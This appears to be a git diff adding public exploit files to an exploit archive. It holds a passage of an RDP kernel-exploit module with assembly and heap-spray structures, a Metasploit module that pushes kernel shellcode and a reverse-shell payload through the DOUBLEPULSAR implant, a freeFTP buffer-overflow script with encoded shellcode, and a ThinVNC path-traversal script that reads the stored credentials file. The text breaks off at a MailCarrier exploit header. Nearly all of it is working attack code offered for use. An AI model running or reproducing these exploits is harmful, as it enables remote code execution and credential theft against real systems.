+      sub rsi, 0x#{CHUNK_SIZE.to_s(16)}
+      mov rax, [rsi - 8]
+      cmp rax, rdi
+      jnz _find_user_egg_loop
+
+  _inner_find_user_egg_loop:
+      inc rsi
+      mov rax, [rsi - 8]
+      cmp rax, rdi
+      jnz _inner_find_user_egg_loop
+
+    pop rdi
+;--------------------------- END HACK EGG USER ------------
+
+    mov ecx, 0x380  ; fix payload size to 0x380 bytes
+
+    rep movsb
+
+    ;======================================
+    ; find CreateThread address (in kernel32.dll)
+    ;======================================
+    mov rax, [rbp+#{data_peb_addr_offset}]
+    mov rax, [rax + 0x18]       ; PEB->Ldr
+    mov rax, [rax + 0x20]       ; InMemoryOrder list
+
+    ;lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
+    ;mov rbx, rsi    ; use rbx for iterating thread
+_find_kernel32_dll_loop:
+    mov rax, [rax]       ; first one always be executable
+    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
+    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
+    ; offset 0x50  => is name
+    ; offset 0x20  => is dllbase
+    ;cmp word [rax+0x38], 0x40
+    ;jne _find_kernel32_dll_loop
+    cmp word [rax+0x48], 0x18
+    jne _find_kernel32_dll_loop
+
+    mov rdx, [rax+0x50]
+    ; check only "32" because name might be lowercase or uppercase
+    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
+    jnz _find_kernel32_dll_loop
+
+    ;int3
+    mov r15, [rax+0x20]
+    mov edi, #{createthread_hash}
+    call get_proc_addr
+
+    ; save CreateThread address to SystemArgument1
+    mov [rbx], rax
+
+_kernel_kapc_routine_exit:
+    xor ecx, ecx
+    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
+    mov byte [rbp+#{data_queueing_kapc_offset}], cl
+    ; restore IRQL to APC_LEVEL
+    mov cl, 1
+    mov cr8, rcx
+
+    pop r15
+    pop rsi
+    pop rdi
+    pop rbx
+    pop rbp
+    ret
+
+userland_start_thread:
+    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
+    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
+    xor ecx, ecx    ; lpThreadAttributes = NULL
+    push rcx        ; lpThreadId = NULL
+    push rcx        ; dwCreationFlags = 0
+    mov r9, rcx     ; lpParameter = NULL
+    lea r8, [rel userland_payload]  ; lpStartAddr
+    mov edx, ecx    ; dwStackSize = 0
+    sub rsp, 0x20
+    call rax
+    add rsp, 0x30
+    ret
+
+userland_payload:
+    ^
+
+    [
+      KERNELMODE_EGG,
+      assemble_with_fixups(asm)
+    ].pack('<Qa*')
+  end
+
+  def create_free_trigger(chan_user_id, chan_id)
+    # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)
+    vprint_status("Creating free trigger for user #{chan_user_id} on channel #{chan_id}")
+    # The extra bytes on the end of the body is what causes the bad things to happen
+    body = "\x00\x00\x00\x00\x00\x00\x00\x00\x02" + "\x00" * 22
+    rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)
+  end
+
+  def create_exploit_channel_buffer(target_addr)
+    overspray_addr = target_addr + 0x2000
+    shellcode_vtbl = target_addr + HEADER_SIZE
+    magic_value1 = overspray_addr + 0x810
+    magic_value2 = overspray_addr + 0x48
+    magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE
+
+    # first 0x38 bytes are used by DATA PDU packet
+    # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE
+    # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm
+    [
+      [
+        # SystemResourceList (2 pointers, each 8 bytes)
+        # Pointer to OWNER_ENTRY (8 bytes)
+        # ActiveCount (SHORT, 2 bytes)
+        # Flag (WORD, 2 bytes)
+        # Padding (BYTE[4], 4 bytes) x64 only
+        0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
+        0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
+        magic_value2, # OwnerThread (ULONG, 8 bytes)
+        magic_value2, # TableSize (ULONG, 8 bytes)
+        0x0, # ActiveEntries (DWORD, 4 bytes)
+        0x0, # ContenttionCount (DWORD, 4 bytes)
+        0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
+        0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
+        0x0, # Reserved2 (PVOID, 8 bytes) x64 only
+        magic_value2, # Address (PVOID, 8 bytes)
+        0x0, # SpinLock (UINT_PTR, 8 bytes)
+      ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
+      [
+        magic_value2, # SystemResourceList (2 pointers, each 8 bytes)
+        magic_value2, # --------------------
+        0x0, # Pointer to OWNER_ENTRY (8 bytes)
+        0x0, # ActiveCount (SHORT, 2 bytes)
+        0x0, # Flag (WORD, 2 bytes)
+        0x0, # Padding (BYTE[4], 4 bytes) x64 only
+        0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)
+        0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)
+        magic_value2, # OwnerThread (ULONG, 8 bytes)
+        magic_value2, # TableSize (ULONG, 8 bytes)
+        0x0, # ActiveEntries (DWORD, 4 bytes)
+        0x0, # ContenttionCount (DWORD, 4 bytes)
+        0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)
+        0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)
+        0x0, # Reserved2 (PVOID, 8 bytes) x64 only
+        magic_value2, # Address (PVOID, 8 bytes)
+        0x0, # SpinLock (UINT_PTR, 8 bytes)
+      ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),
+      [
+        0x1F, # ClassOffset (DWORD, 4 bytes)
+        0x0, # bindStatus (DWORD, 4 bytes)
+        0x72, # lockCount1 (QWORD, 8 bytes)
+        magic_value3, # connection (QWORD, 8 bytes)
+        shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)
+        0x5, # channelClass (DWORD, 4 bytes)
+        "MS_T120\x00".encode('ASCII'), # channelName (BYTE[8], 8 bytes)
+        0x1F, # channelIndex (DWORD, 4 bytes)
+        magic_value1, # channels (QWORD, 8 bytes)
+        magic_value1, # connChannelsAddr (POINTER, 8 bytes)
+        magic_value1, # list1 (QWORD, 8 bytes)
+        magic_value1, # list1 (QWORD, 8 bytes)
+        magic_value1, # list2 (QWORD, 8 bytes)
+        magic_value1, # list2 (QWORD, 8 bytes)
+        0x65756c62, # inputBufferLen (DWORD, 4 bytes)
+        0x7065656b, # inputBufferLen (DWORD, 4 bytes)
+        magic_value1, # connResrouce (QWORD, 8 bytes)
+        0x65756c62, # lockCount158 (DWORD, 4 bytes)
+        0x7065656b, # dword15C (DWORD, 4 bytes)
+      ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')
+    ].join('')
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/47456.rb b/exploits/windows/remote/47456.rb
new file mode 100755
index 000000000..58dac1fb3
--- /dev/null
+++ b/exploits/windows/remote/47456.rb
@@ -0,0 +1,384 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::SMB::Client
+
+  MAX_SHELLCODE_SIZE = 4096
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'DOUBLEPULSAR Payload Execution and Neutralization',
+      'Description'      => %q{
+        This module executes a Metasploit payload against the Equation Group's
+        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.
+
+        While this module primarily performs code execution against the implant,
+        the "Neutralize implant" target allows you to disable the implant.
+      },
+      'Author'           => [
+        'Equation Group', # DOUBLEPULSAR implant
+        'Shadow Brokers', # Equation Group dump
+        'zerosum0x0',     # DOPU analysis and detection
+        'Luke Jennings',  # DOPU analysis and detection
+        'wvu',            # Metasploit module and arch detection
+        'Jacob Robles'    # Metasploit module and RCE help
+      ],
+      'References'       => [
+        ['MSB', 'MS17-010'],
+        ['CVE', '2017-0143'],
+        ['CVE', '2017-0144'],
+        ['CVE', '2017-0145'],
+        ['CVE', '2017-0146'],
+        ['CVE', '2017-0147'],
+        ['CVE', '2017-0148'],
+        ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],
+        ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],
+        ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],
+        ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
+        ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
+        ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
+      ],
+      'DisclosureDate'   => '2017-04-14',
+      'License'          => MSF_LICENSE,
+      'Platform'         => 'win',
+      'Arch'             => ARCH_X64,
+      'Privileged'       => true,
+      'Payload'          => {
+        'Space'          => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
+        'DisableNops'    => true
+      },
+      'Targets'          => [
+        ['Execute payload',    {}],
+        ['Neutralize implant', {}]
+      ],
+      'DefaultTarget'    => 0,
+      'DefaultOptions'   => {
+        'EXITFUNC'       => 'thread',
+        'PAYLOAD'        => 'windows/x64/meterpreter/reverse_tcp'
+      },
+      'Notes'            => {
+        'AKA'            => ['DOUBLEPULSAR'],
+        'RelatedModules' => [
+          'auxiliary/scanner/smb/smb_ms17_010',
+          'exploit/windows/smb/ms17_010_eternalblue'
+        ],
+        'Stability'      => [CRASH_SAFE],
+        'Reliability'    => [REPEATABLE_SESSION]
+      }
+    ))
+
+    register_advanced_options([
+      OptBool.new('DefangedMode',  [true, 'Run in defanged mode', true]),
+      OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])
+    ])
+  end
+
+  OPCODES = {
+    ping: 0x23,
+    exec: 0xc8,
+    kill: 0x77
+  }
+
+  STATUS_CODES = {
+    not_detected:   0x00,
+    success:        0x10,
+    invalid_params: 0x20,
+    alloc_failure:  0x30
+  }
+
+  def calculate_doublepulsar_status(m1, m2)
+    STATUS_CODES.key(m2.to_i - m1.to_i)
+  end
+
+  # algorithm to calculate the XOR Key for DoublePulsar knocks
+  def calculate_doublepulsar_xor_key(s)
+    x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
+    x & 0xffffffff  # this line was added just to truncate to 32 bits
+  end
+
+  # The arch is adjacent to the XOR key in the SMB signature
+  def calculate_doublepulsar_arch(s)
+    s == 0 ? ARCH_X86 : ARCH_X64
+  end
+
+  def generate_doublepulsar_timeout(op)
+    k = SecureRandom.random_bytes(4).unpack('V').first
+    0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
+  end
+
+  def generate_doublepulsar_param(op, body)
+    case OPCODES.key(op)
+    when :ping, :kill
+      "\x00" * 12
+    when :exec
+      Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))
+    end
+  end
+
+  def check
+    ipc_share = "\\\\#{rhost}\\IPC$"
+
+    @tree_id = do_smb_setup_tree(ipc_share)
+    vprint_good("Connected to #{ipc_share} with TID = #{@tree_id}")
+    vprint_status("Target OS is #{smb_peer_os}")
+
+    vprint_status('Sending ping to DOUBLEPULSAR')
+    code, signature1, signature2 = do_smb_doublepulsar_pkt
+    msg = 'Host is likely INFECTED with DoublePulsar!'
+
+    case calculate_doublepulsar_status(@multiplex_id, code)
+    when :success
+      @xor_key = calculate_doublepulsar_xor_key(signature1)
+      @arch = calculate_doublepulsar_arch(signature2)
+
+      arch_str =
+        case @arch
+        when ARCH_X86
+          'x86 (32-bit)'
+        when ARCH_X64
+          'x64 (64-bit)'
+        end
+
+      vprint_good("#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}")
+      CheckCode::Vulnerable
+    when :not_detected
+      vprint_error('DOUBLEPULSAR not detected or disabled')
+      CheckCode::Safe
+    else
+      vprint_error('An unknown error occurred')
+      CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    if datastore['DefangedMode']
+      warning = <<~EOF
+
+
+        Are you SURE you want to execute code against a nation-state implant?
+        You MAY contaminate forensic evidence if there is an investigation.
+
+        Disable the DefangedMode option if you have authorization to proceed.
+      EOF
+
+      fail_with(Failure::BadConfig, warning)
+    end
+
+    # No ForceExploit because @tree_id and @xor_key are required
+    unless check == CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')
+    end
+
+    case target.name
+    when 'Execute payload'
+      unless @xor_key
+        fail_with(Failure::NotFound, 'XOR key not found')
+      end
+
+      if @arch == ARCH_X86
+        fail_with(Failure::NoTarget, 'x86 is not a supported target')
+      end
+
+      print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
+      shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
+      shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
+      vprint_status("Total shellcode length: #{shellcode.length} bytes")
+
+      print_status("Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}")
+      xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)
+
+      print_status('Sending shellcode to DOUBLEPULSAR')
+      code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)
+    when 'Neutralize implant'
+      return neutralize_implant
+    end
+
+    case calculate_doublepulsar_status(@multiplex_id, code)
+    when :success
+      print_good('Payload execution successful')
+    when :invalid_params
+      fail_with(Failure::BadConfig, 'Invalid parameters were specified')
+    when :alloc_failure
+      fail_with(Failure::PayloadFailed, 'An allocation failure occurred')
+    else
+      fail_with(Failure::Unknown, 'An unknown error occurred')
+    end
+  ensure
+    disconnect
+  end
+
+  def neutralize_implant
+    print_status('Neutralizing DOUBLEPULSAR')
+    code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])
+
+    case calculate_doublepulsar_status(@multiplex_id, code)
+    when :success
+      print_good('Implant neutralization successful')
+    else
+      fail_with(Failure::Unknown, 'An unknown error occurred')
+    end
+  end
+
+  def do_smb_setup_tree(ipc_share)
+    connect
+
+    # logon as user \
+    simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])
+
+    # connect to IPC$
+    simple.connect(ipc_share)
+
+    # return tree
+    simple.shares[ipc_share]
+  end
+
+  def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)
+    # make doublepulsar knock
+    pkt = make_smb_trans2_doublepulsar(opcode, body)
+
+    sock.put(pkt)
+    bytes = sock.get_once
+
+    return unless bytes
+
+    # convert packet to response struct
+    pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct
+    pkt.from_s(bytes[4..-1])
+
+    return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']
+  end
+
+  def make_smb_trans2_doublepulsar(opcode, body)
+    setup_count = 1
+    setup_data = [0x000e].pack('v')
+
+    param = generate_doublepulsar_param(opcode, body)
+    data = param + body.to_s
+
+    pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct
+    simple.client.smb_defaults(pkt['Payload']['SMB'])
+
+    base_offset = pkt.to_s.length + (setup_count * 2) - 4
+    param_offset = base_offset
+    data_offset = param_offset + param.length
+
+    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
+    pkt['Payload']['SMB'].v['Flags1'] = 0x18
+    pkt['Payload']['SMB'].v['Flags2'] = 0xc007
+
+    @multiplex_id = rand(0xffff)
+
+    pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count
+    pkt['Payload']['SMB'].v['TreeID'] = @tree_id
+    pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id
+
+    pkt['Payload'].v['ParamCountTotal'] = param.length
+    pkt['Payload'].v['DataCountTotal'] = body.to_s.length
+    pkt['Payload'].v['ParamCountMax'] = 1
+    pkt['Payload'].v['DataCountMax'] = 0
+    pkt['Payload'].v['ParamCount'] = param.length
+    pkt['Payload'].v['ParamOffset'] = param_offset
+    pkt['Payload'].v['DataCount'] = body.to_s.length
+    pkt['Payload'].v['DataOffset'] = data_offset
+    pkt['Payload'].v['SetupCount'] = setup_count
+    pkt['Payload'].v['SetupData'] = setup_data
+    pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)
+    pkt['Payload'].v['Payload'] = data
+
+    pkt.to_s
+  end
+
+  # ring3 = user mode encoded payload
+  # proc_name = process to inject APC into
+  def make_kernel_user_payload(ring3, proc_name)
+    sc = make_kernel_shellcode(proc_name)
+
+    sc << [ring3.length].pack("S<")
+    sc << ring3
+
+    sc
+  end
+
+  def generate_process_hash(process)
+    # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    proc_hash = 0
+    process << "\x00"
+
+    process.each_byte do |c|
+      proc_hash  = ror(proc_hash, 13)
+      proc_hash += c
+    end
+
+    [proc_hash].pack('l<')
+  end
+
+  def ror(dword, bits)
+    (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
+  end
+
+  def make_kernel_shellcode(proc_name)
+    # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    # Length: 780 bytes
+    "\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" +
+    "\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" +
+    "\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" +
+    "\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" +
+    "\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" +
+    "\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" +
+    "\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" +
+    "\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" +
+    "\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" +
+    "\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" +
+    "\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" +
+    "\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" +
+    "\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
+    generate_process_hash(proc_name.upcase) +
+    "\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" +
+    "\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" +
+    "\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" +
+    "\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" +
+    "\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" +
+    "\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" +
+    "\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" +
+    "\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" +
+    "\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" +
+    "\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" +
+    "\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" +
+    "\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" +
+    "\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" +
+    "\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" +
+    "\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" +
+    "\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" +
+    "\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" +
+    "\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" +
+    "\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" +
+    "\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" +
+    "\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" +
+    "\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" +
+    "\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
+    "\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" +
+    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" +
+    "\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" +
+    "\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" +
+    "\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" +
+    "\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" +
+    "\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" +
+    "\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" +
+    "\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" +
+    "\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" +
+    "\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" +
+    "\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" +
+    "\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
+  end
+
+  def kernel_shellcode_size
+    make_kernel_shellcode('').length
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/47472.py b/exploits/windows/remote/47472.py
new file mode 100755
index 000000000..07643c6e1
--- /dev/null
+++ b/exploits/windows/remote/47472.py
@@ -0,0 +1,63 @@
+# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
+# Date: 2019-09-01
+# Author: Chet Manly
+# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
+# Version: 1.0.8
+# CVE: N/A
+
+from ftplib import FTP
+
+buf =  ""
+buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
+buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
+buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
+buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
+buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
+buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
+buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
+buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
+buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
+buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
+buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
+buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
+buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
+buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
+buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
+buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
+buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
+buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
+buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
+buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
+buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
+buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
+buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
+buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
+buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
+buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
+buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
+buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
+buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
+buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
+buf += "\x45\x35\x53\x30\x41\x41"
+
+buf = 'A' * 276
+buf += '\x90' * 10
+buf += shellcode
+buf += 'B' * (486 - len(shellcode))
+buf += '\x58' # pop eax
+buf += '\xfe\xcc' # dec ah
+buf += '\xfe\xcc' # dec ah
+buf += '\xff\xe0' # jmp eax
+buf += 'C' * 4
+buf += '\xe8\xf0\xff\xff\xff' # call near
+buf += 'D' * 9
+buf += '\xeb\xf0\x90\x90' # jump backwards
+buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret
+buf += 'E' * (1000 - len(buf))
+ftp = FTP()
+ftp.connect('192.168.1.1', 21)
+ftp.login('anonymous', buf)
\ No newline at end of file
diff --git a/exploits/windows/remote/47519.py b/exploits/windows/remote/47519.py
new file mode 100755
index 000000000..53a82bd33
--- /dev/null
+++ b/exploits/windows/remote/47519.py
@@ -0,0 +1,39 @@
+# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
+# Date: 2019-10-17
+# Exploit Author: Nikhith Tumamlapalli
+# Contributor WarMarX
+# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
+# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
+# Version: 1.0b1
+# Tested on: Windows All Platforms
+# CVE : CVE-2019-17662
+
+# Description:
+# Authentication Bypass via Arbitrary File Read
+
+#!/usr/bin/python3
+
+import sys
+import os
+import requests
+
+def exploit(host,port):
+    url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
+    r = requests.get(url)
+    body = r.text
+    print(body.splitlines()[2])
+    print(body.splitlines()[3])
+
+
+
+def main():
+    if(len(sys.argv)!=3):
+        print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
+        print("Example:\n{} 192.168.0.10 5888")
+    else:
+        port = sys.argv[2]
+        host = sys.argv[1]
+        exploit(host,port)
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/windows/remote/47554.py b/exploits/windows/remote/47554.py
new file mode 100755
index 000000000..c71a7de2f
--- /dev/null
+++ b/exploits/windows/remote/47554.py
@@ -0,0 +1,66 @@
+# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
+# Date: 2019-10-01
+# Author: Lance Biggerstaff
+# Original Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Tested on: Windows 10
